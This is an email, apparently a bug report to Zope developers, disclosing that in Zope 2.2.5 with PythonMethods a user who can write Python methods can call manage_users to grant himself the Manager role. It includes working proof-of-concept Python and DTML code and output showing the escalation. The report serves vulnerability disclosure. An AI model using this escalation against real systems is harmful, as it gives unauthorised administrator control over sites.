Evan - I believe I have found a situation while using python methods that exposes a security hole. A user that can create python methods can grant the Manager role to himself by simply writing and then calling the manage_users method. This issue might also apply to other scenarios. I created a simple test case to check the behavior ... - create a user without any roles in a acl_users folder (see below) - create a python method such as the one below that grants root access to the user (see below) - create a dtml method that calls the python method .... this method should have view and access content information granted (see below) to the user created in the first step. In my case, I'm simply using the anonymous role ... but it could be another role setup for developers, content editors, etc. - execute the dtml method (see below) I also created a similiar test case for dtml methods and the dtml method behaved as I expected .... preventing the user from obtaining the manage_users role because they do not have the role in the first place. I just want to confirm if this is a known issue or a new issue (or feature or mistake in my zope setup). I'm currently running with zope 2.2.5 and python methods 0-1-7. If this is indeed an issue, it might be worthwhile to simply document this issue on the PythonMethods product page. thanks, - joe n. ############################################################################### # Here is the output of this behavior ... UserName: dummy_non_manager Roles: () Has 'View' ?: 0 Has 'Manage users' ?: 0 user 'dummy_non_manager' roles '['Manager']' user 'dummy_manager' roles '['Manager']' UserName: dummy_non_manager Roles: ('Manager',) Has 'View' ?: 1 Has 'Manage users' ?: 1 ############################################################################### # Here is the python method args: self,REQUEST body: ret = '' users = {'dummy_manager' : ['Manager'],'dummy_non_manager' : ['Manager']} for u in users.keys(): roles = users.get(u) REQUEST.set('name', u) REQUEST.set('roles', roles) self.acl_users.manage_users('Change',REQUEST) ret = ret + ('user \'%s\' roles \'%s\' <br>\n' % (u, roles)) return ret ############################################################################### # Here is the dtml method: <dtml-var standard_html_header> UserName: <dtml-var "REQUEST['AUTHENTICATED_USER'].getUserName()"><br> Roles: <dtml-var "REQUEST['AUTHENTICATED_USER'].getRoles()"><br> Has 'View' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br> Has 'Manage users' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('Manage users',REQUEST['AUTHENTICATED_USER'])"><br> <dtml-var "acl_users_roles_python_method(REQUEST)"> UserName: <dtml-var "REQUEST['AUTHENTICATED_USER'].getUserName()"><br> Roles: <dtml-var "REQUEST['AUTHENTICATED_USER'].getRoles()"><br> Has 'View' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br> Has 'Manage users' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('Manage users',REQUEST['AUTHENTICATED_USER'])"><br> <dtml-var standard_html_footer> -- -- Joseph Norton norton@alum.mit.edu +81-3-3822-6936 2-10-7 Tabata, Kita-ku, Tokyo 114-0014, Japan (〒114-0014 東京都北区田端２丁目10-7)